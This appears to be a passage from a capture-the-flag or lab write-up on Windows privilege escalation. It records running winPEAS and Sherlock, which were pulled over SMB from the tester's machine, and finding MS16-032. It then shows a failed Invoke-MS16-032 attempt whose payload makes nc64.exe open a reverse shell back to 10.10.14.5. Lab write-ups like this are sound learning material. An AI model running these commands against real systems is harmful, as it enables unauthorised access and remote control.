PEAS


ps c:\tmp> copy \\10.10.14.5\smb\winPEASany.exe
ps c:\tmp> cmd.exe /c C:\tmp\winPEASany.exe

Binary transferred over SMB and executed

Watson failed to execute because the target system does not have the minimum required .NET Framework 4.25.

No AV

Everything else had already been enumerated earlier. Nothing new was discovered.

Sherlock


Since Watson was never executed, I will opt for Sherlock.

PS C:\tmp> copy \\10.10.14.5\smb\Sherlock.ps1
PS C:\tmp> . .\Sherlock.ps1
PS C:\tmp> Find-AllVulns
 
Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Sherlock found a single vulnerability: CVE-2016-0099. This has to be confirmed.

Invoke-MS16-032


ps c:\tmp> Invoke-MS16-032 -Command "C:\tmp\nc64.exe 10.10.14.5 1234 -e cmd.exe"
     __ __ ___ ___   ___     ___ ___ ___ 
    |  V  |  _|_  | |  _|___|   |_  |_  |
    |     |_  |_| |_| . |___| | |_  |  _|
    |_|_|_|___|_____|___|   |___|___|___|
                                        
                   [by b33f -> @FuzzySec]
[!] No valid thread handles were captured, exiting!

It failed.